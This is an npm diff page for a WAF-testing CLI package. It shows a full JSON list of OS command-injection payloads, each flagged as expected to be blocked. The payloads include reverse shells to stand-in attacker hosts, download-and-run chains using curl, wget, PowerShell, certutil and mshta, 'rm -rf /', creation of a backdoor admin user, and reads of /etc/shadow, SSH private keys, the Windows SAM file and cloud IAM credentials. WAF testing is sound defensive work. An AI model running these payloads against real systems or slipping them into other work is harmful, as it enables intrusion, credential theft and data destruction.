npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/injection/oscmd.json ADDED Viewed

@@ -0,0 +1,662 @@
+[
+  {
+      "id": "INJ-COMMAND-250",
+      "payload": "; ls -la",
+      "tags": [
+        "unix",
+        "semicolon",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix command injection - semicolon separator",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-251",
+      "payload": "| cat /etc/passwd",
+      "tags": [
+        "unix",
+        "pipe",
+        "quick",
+        "sensitive"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix pipe command injection - read passwd file",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-252",
+      "payload": "& dir",
+      "tags": [
+        "windows",
+        "ampersand",
+        "quick"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows command injection - ampersand separator",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-253",
+      "payload": "|| whoami",
+      "tags": [
+        "unix",
+        "or-operator"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix OR operator - command chaining",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-254",
+      "payload": "&& id",
+      "tags": [
+        "unix",
+        "and-operator"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix AND operator - conditional execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-255",
+      "payload": "`whoami`",
+      "tags": [
+        "unix",
+        "backtick",
+        "substitution"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix backtick command substitution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-256",
+      "payload": "$(cat /etc/shadow)",
+      "tags": [
+        "unix",
+        "substitution",
+        "sensitive"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix $() command substitution - read shadow file",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-257",
+      "payload": "> /tmp/owned",
+      "tags": [
+        "unix",
+        "redirect",
+        "file-write"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix output redirection - file creation",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-258",
+      "payload": "< /etc/hosts",
+      "tags": [
+        "unix",
+        "redirect",
+        "file-read"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix input redirection - file read",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-259",
+      "payload": "; curl http://attacker.com/shell.sh | sh",
+      "tags": [
+        "unix",
+        "rce",
+        "download-execute"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix download and execute remote shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-260",
+      "payload": "; nc -e /bin/sh attacker.com 4444",
+      "tags": [
+        "unix",
+        "rce",
+        "reverse-shell"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix netcat reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-261",
+      "payload": "; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
+      "tags": [
+        "unix",
+        "rce",
+        "python-shell"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix Python reverse shell one-liner",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-262",
+      "payload": "; bash -i >& /dev/tcp/attacker.com/4444 0>&1",
+      "tags": [
+        "unix",
+        "rce",
+        "bash-reverse-shell"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix Bash TCP reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-263",
+      "payload": "; rm -rf /",
+      "tags": [
+        "unix",
+        "destructive"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix recursive deletion (DESTRUCTIVE)",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-264",
+      "payload": "; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware",
+      "tags": [
+        "unix",
+        "rce",
+        "malware"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix download, make executable, and run malware",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-265",
+      "payload": "& powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')\"",
+      "tags": [
+        "windows",
+        "powershell",
+        "rce"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows PowerShell download and execute",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-266",
+      "payload": "& net user hacker P@ssw0rd /add",
+      "tags": [
+        "windows",
+        "persistence"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows add new user (persistence)",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-267",
+      "payload": "& net localgroup administrators hacker /add",
+      "tags": [
+        "windows",
+        "privilege-escalation"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows add user to administrators group",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-268",
+      "payload": "& type C:\\Windows\\System32\\config\\SAM",
+      "tags": [
+        "windows",
+        "sensitive"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Windows read SAM file (password hashes)",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-269",
+      "payload": "& reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
+      "tags": [
+        "windows",
+        "registry",
+        "persistence"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Windows registry enumeration - startup programs",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-270",
+      "payload": "; cat /proc/self/environ",
+      "tags": [
+        "unix",
+        "env-vars"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix read process environment variables",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-271",
+      "payload": "; printenv",
+      "tags": [
+        "unix",
+        "env-vars"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix print all environment variables",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-272",
+      "payload": "; cat ~/.ssh/id_rsa",
+      "tags": [
+        "unix",
+        "ssh-keys",
+        "sensitive"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix read SSH private key",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-273",
+      "payload": "; find / -name \"*.conf\" -type f",
+      "tags": [
+        "unix",
+        "enumeration"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix find all config files",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-274",
+      "payload": "; ps aux",
+      "tags": [
+        "unix",
+        "enumeration"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Unix list all running processes",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-275",
+      "payload": "; netstat -tulpn",
+      "tags": [
+        "unix",
+        "enumeration",
+        "network"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix enumerate listening network ports",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-276",
+      "payload": "; uname -a",
+      "tags": [
+        "unix",
+        "enumeration",
+        "recon"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Unix system information disclosure",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-277",
+      "payload": "& systeminfo",
+      "tags": [
+        "windows",
+        "enumeration",
+        "recon"
+    ],
+      "expected_block": true,
+      "severity_hint": "Medium",
+      "notes": "Windows system information disclosure",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-278",
+      "payload": "; cat /etc/crontab",
+      "tags": [
+        "unix",
+        "enumeration"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Unix read scheduled tasks",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-279",
+      "payload": "; curl http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+      "tags": [
+        "unix",
+        "cloud",
+        "aws",
+        "ssrf"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Unix AWS metadata service - steal IAM credentials",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-280",
+      "payload": ";${IFS}cat${IFS}/etc/passwd",
+      "tags": ["unix", "ifs-bypass", "whitespace"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "IFS variable whitespace bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-281",
+      "payload": ";{cat,/etc/passwd}",
+      "tags": ["unix", "brace-expansion"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bash brace expansion bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-282",
+      "payload": "$(<\"/etc/passwd\")",
+      "tags": ["unix", "file-substitution"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "File content substitution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-283",
+      "payload": ";ca$()t /etc/passwd",
+      "tags": ["unix", "inline-substitution", "bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Empty substitution command bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-284",
+      "payload": ";ca''t /etc/passwd",
+      "tags": ["unix", "quote-bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Single quote splitting bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-285",
+      "payload": ";ca\"\"t /etc/passwd",
+      "tags": ["unix", "double-quote-bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Double quote splitting bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-286",
+      "payload": ";c\\at /etc/passwd",
+      "tags": ["unix", "backslash-bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Backslash escape bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-287",
+      "payload": ";/???/c?t /etc/passwd",
+      "tags": ["unix", "glob-bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Glob pattern command bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-288",
+      "payload": ";/???/???/c?t /etc/passwd",
+      "tags": ["unix", "glob-path"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Glob pattern path bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-289",
+      "payload": "echo$IFS'test'$IFS>/tmp/pwned",
+      "tags": ["unix", "ifs", "file-write"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "IFS-based file write",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-290",
+      "payload": ";base64 /etc/passwd",
+      "tags": ["unix", "encoding", "exfiltration"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Base64 encoded exfiltration",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-291",
+      "payload": ";xxd /etc/passwd",
+      "tags": ["unix", "hex", "exfiltration"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Hex dump exfiltration",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-292",
+      "payload": ";od -A x -t x1z /etc/passwd",
+      "tags": ["unix", "octal-dump"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Octal dump exfiltration",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-293",
+      "payload": "$(python -c 'print(open(\"/etc/passwd\").read())')",
+      "tags": ["unix", "python", "inline"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Python inline code execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-294",
+      "payload": "$(perl -e 'print `cat /etc/passwd`')",
+      "tags": ["unix", "perl", "inline"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Perl inline code execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-295",
+      "payload": "$(ruby -e 'puts File.read(\"/etc/passwd\")')",
+      "tags": ["unix", "ruby", "inline"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Ruby inline code execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-296",
+      "payload": ";curl attacker.com/shell.sh|sh",
+      "tags": ["unix", "curl", "remote-exec"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Remote shell download and execute",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-297",
+      "payload": ";wget -O- attacker.com/shell.sh|bash",
+      "tags": ["unix", "wget", "remote-exec"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Wget remote shell execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-298",
+      "payload": ";bash -c 'bash -i >& /dev/tcp/attacker/4444 0>&1'",
+      "tags": ["unix", "reverse-shell", "tcp"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Bash TCP reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-299",
+      "payload": ";nc -e /bin/sh attacker 4444",
+      "tags": ["unix", "netcat", "reverse-shell"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Netcat reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-300",
+      "payload": ";mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker 4444>/tmp/f",
+      "tags": ["unix", "fifo", "reverse-shell"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "FIFO-based reverse shell",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-301",
+      "payload": "& powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')\"",
+      "tags": ["windows", "powershell", "remote-exec"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PowerShell download cradle",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-302",
+      "payload": "& powershell -enc JABjAGwAaQBlAG4AdAA=",
+      "tags": ["windows", "powershell", "encoded"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PowerShell encoded command",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-303",
+      "payload": "& certutil -urlcache -split -f http://attacker/shell.exe shell.exe",
+      "tags": ["windows", "certutil", "download"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Certutil file download",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-304",
+      "payload": "& bitsadmin /transfer job http://attacker/shell.exe c:\\shell.exe",
+      "tags": ["windows", "bitsadmin", "download"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "BITSAdmin file download",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-305",
+      "payload": "& mshta http://attacker/shell.hta",
+      "tags": ["windows", "mshta", "remote-exec"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "MSHTA remote HTA execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-306",
+      "payload": "& regsvr32 /s /n /u /i:http://attacker/shell.sct scrobj.dll",
+      "tags": ["windows", "regsvr32", "bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Regsvr32 AppLocker bypass",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-307",
+      "payload": "& rundll32 javascript:\"\\..\\mshtml,RunHTMLApplication\";document.write();h=new%20ActiveXObject",
+      "tags": ["windows", "rundll32", "bypass"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Rundll32 JavaScript execution",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-308",
+      "payload": ";env | grep -i password",
+      "tags": ["unix", "env", "credential"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Environment variable password search",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-309",
+      "payload": ";find / -name '*.conf' 2>/dev/null | head -20",
+      "tags": ["unix", "find", "enumeration"],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "Configuration file enumeration",
+      "category": "Injection"
+  },
+  {
+      "id": "INJ-COMMAND-310",
+      "payload": ";grep -r 'password' /etc/ 2>/dev/null",
+      "tags": ["unix", "grep", "credential"],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Grep for passwords in /etc",
+      "category": "Injection"
+  }
+]